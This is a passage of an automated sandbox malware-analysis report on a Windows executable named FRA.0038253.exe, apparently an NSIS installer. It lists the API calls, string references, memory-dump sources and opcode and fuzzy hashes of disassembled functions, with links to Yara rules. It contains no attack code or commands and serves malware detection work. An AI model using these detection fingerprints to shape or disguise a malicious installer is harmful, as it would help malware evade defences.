                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(spidsmus: Installing,spidsmus: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A5B,000000DF,00000000,00000400,?), ref: 00404BDE
                                                                          • wsprintfA.USER32 ref: 00404BE6
                                                                          • SetDlgItemTextA.USER32(?,spidsmus: Installing), ref: 00404BF9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s$spidsmus: Installing
                                                                          • API String ID: 3540041739-1409120186
                                                                          • Opcode ID: a5732b3fab1214b731562ca4b882e9a365cf2c12af788ea161dae27cdf89a830
                                                                          • Instruction ID: 0f727862f51d352610fea8a63e59c27acbad4445b5ecdc76debdb0bc002e9b6e
                                                                          • Opcode Fuzzy Hash: a5732b3fab1214b731562ca4b882e9a365cf2c12af788ea161dae27cdf89a830
                                                                          • Instruction Fuzzy Hash: ED11DA73A041287BDB00656D9C42FAF329CDB85374F25023BFA26F61D1E978DC5242E9
                                                                          Function 00401D8A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,?), ref: 00401DA3
                                                                          • GetClientRect.USER32(?,?), ref: 00401DF1
                                                                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                                                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                                                          • DeleteObject.GDI32(00000000), ref: 00401E45
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: 4f8b06ef1554d3130525af37609f0cd59d85352a8a990cb9f2c0f1b35a7c96bf
                                                                          • Instruction ID: 746c59d1437bb01e9975c654004221c93fbac59f453bb30d5aabfb267da63d2b
                                                                          • Opcode Fuzzy Hash: 4f8b06ef1554d3130525af37609f0cd59d85352a8a990cb9f2c0f1b35a7c96bf
                                                                          • Instruction Fuzzy Hash: 79210A72A00509AFDF15DF94DD45AAEBBB6FB48301F10407AF905F62A1CB389941DB58
                                                                          Function 00401C53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: 70784c9047b60046e9e3528a8d3de8a6dccf642d7c00f88c70359578e2944abe
                                                                          • Instruction ID: 28bf5349fbdec280649c1153a3a1bbf5ef22c16b7a5e3f55ad78bc54c06e69b8
                                                                          • Opcode Fuzzy Hash: 70784c9047b60046e9e3528a8d3de8a6dccf642d7c00f88c70359578e2944abe
                                                                          • Instruction Fuzzy Hash: 2821B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF505B61D1C6B98681DB18
                                                                          Function 00405BE9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040338F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 00405BEF
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040338F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 00405BF8
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C09
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-787714339
                                                                          • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                          • Instruction ID: cba260e235d0580f5c950035338bb0f46aaad3af700efad284f84c88228f902a
                                                                          • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                          • Instruction Fuzzy Hash: 42D0A762609A306AE10136254D05EDB194C8F0235070504AAF140B21A1C67C4C1147FD
                                                                          Function 00402ECD Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                                                          • GetTickCount.KERNEL32 ref: 00402EFE
                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                                                          • ShowWindow.USER32(00000000,00000005,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 1d3f055a620e94d7ccdcda5491db08c2aebb89be3b413bcb1de2378eb3418377
                                                                          • Instruction ID: 09342015f1b1cf9a52f0fbe22e70ee98646cc1a5079e40a8b9524ecf846e7703
                                                                          • Opcode Fuzzy Hash: 1d3f055a620e94d7ccdcda5491db08c2aebb89be3b413bcb1de2378eb3418377
                                                                          • Instruction Fuzzy Hash: 5FF05E30551621EBC661EB50FE4CA9B7BA4FB44B12711443AF004B16A8CB7448868BDC
                                                                          Function 0040530F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 0040533E
                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 0040538F
                                                                            • Part of subcall function 00404343: SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 00404355
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: 1a3edb13fbb9d77a7e945387c8f49b4177271b2a1e893ed2b4ba779e46112139
                                                                          • Instruction ID: 7782e163affc8db73a001c6411346d0d8bc7086ce8c9e55e25ece69e8a57b7a3
                                                                          • Opcode Fuzzy Hash: 1a3edb13fbb9d77a7e945387c8f49b4177271b2a1e893ed2b4ba779e46112139
                                                                          • Instruction Fuzzy Hash: 50015EB160060CAFEF215F51DD80AAB3766EB84390F104136FE017A1D1C7BA9992DE69
                                                                          Function 00405CD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,00403545,spidsmus,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406264
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(?,?,00421D28,0000000C,00405CEE,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405C90
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                          • lstrlenA.KERNEL32(00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405D2A
                                                                          • GetFileAttributesA.KERNEL32(00421D28,00421D28,00421D28,00421D28,00421D28,00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\), ref: 00405D3A
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3248276644-787714339
                                                                          • Opcode ID: 2a969093c675307beb61016a7d711a3cc48518ddeb68e40ae6e7fa30b2cf6e1d
                                                                          • Instruction ID: a0c4f5802b8783ed5b0ab004fa410debae2a95b7635eb7a7420141fd0de1c27f
                                                                          • Opcode Fuzzy Hash: 2a969093c675307beb61016a7d711a3cc48518ddeb68e40ae6e7fa30b2cf6e1d
                                                                          • Instruction Fuzzy Hash: 9BF0C835118F6526E72632391C49AAF1A45CD93328719453FFCA2B52D1CE3C89439E6E
                                                                          Function 004039CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,77673410,00000000,C:\Users\user\AppData\Local\Temp\,004039A3,00403789,?,?,00000008,0000000A,0000000C), ref: 004039E5
                                                                          • GlobalFree.KERNEL32(?), ref: 004039EC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004039CB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 1100898210-787714339
                                                                          • Opcode ID: ca298928d6acf9595f75de0ead6f6aa016ee95e771ecb86a17bb6358c8d46369
                                                                          • Instruction ID: f1be465c367285d7fd3695d73ea3e51cf945aaeab50562acdc69a15f0740ffc8
                                                                          • Opcode Fuzzy Hash: ca298928d6acf9595f75de0ead6f6aa016ee95e771ecb86a17bb6358c8d46369
                                                                          • Instruction Fuzzy Hash: 50E012339011309BCB216F49EE0579A77A86F44B22F09417BE9847B261CBB45C875BD8
                                                                          Function 00405C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FRA.0038253.exe,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A), ref: 00405C36
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FRA.0038253.exe,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?), ref: 00405C44
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-3443045126
                                                                          • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                          • Instruction ID: b844601d19cb383c6f31b516b40f73b18c9a52bfffe10955a395c2d16e96f730
                                                                          • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                          • Instruction Fuzzy Hash: 3ED0A76240CE745EF30362208D00B9F6A88DF12340F0A04E6F081A2190C2780C414BAD
                                                                          Function 707510E0 Relevance: 5.1, APIs: 4, Instructions: 144memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 7075116B
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 707511D8
                                                                          • GlobalFree.KERNEL32(?), ref: 70751286
                                                                          • GlobalFree.KERNEL32(00000000), ref: 7075129B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 3394109436-0
                                                                          • Opcode ID: 6f7cd3754f3002963c9195a8e81c8bc670a641dc5d066229bca89b093d1e6720
                                                                          • Instruction ID: d75bcf6b2ea163b52314e8c6eca691cd81d9e1f0a4765002473d357fd1dda4ec
                                                                          • Opcode Fuzzy Hash: 6f7cd3754f3002963c9195a8e81c8bc670a641dc5d066229bca89b093d1e6720
                                                                          • Instruction Fuzzy Hash: 42519E7660034A9FD701CF69C999BEA7BB8FB49342FA40459F54AC73A0E730A818CB55
                                                                          Function 00405D4F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D77
                                                                          • CharNextA.USER32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D88
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                                                          • Instruction ID: 43996ca3ab7d586e29a4a0ccbdc95befbe25e9bf7c7258af82bb3841131231c5
                                                                          • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                                                          • Instruction Fuzzy Hash: 5FF06236204418BFCB129FA5DD4499FBBA8EF45254B2580AAE840F7211D674DE01ABA9

                                                                          Execution Graph

                                                                          Execution Coverage:0%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:100%
                                                                          Total number of Nodes:1
                                                                          Total number of Limit Nodes:0
                                                                          execution_graph 43381 35722b90 LdrInitializeThunk

                                                                          Executed Functions

                                                                          Function 357234E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2 357234e0-357234ec LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 19a3d3982eb6d7a5057a652e025d6ab8b8bdbe8d4a15ed4f4cdd9c4033abce7b
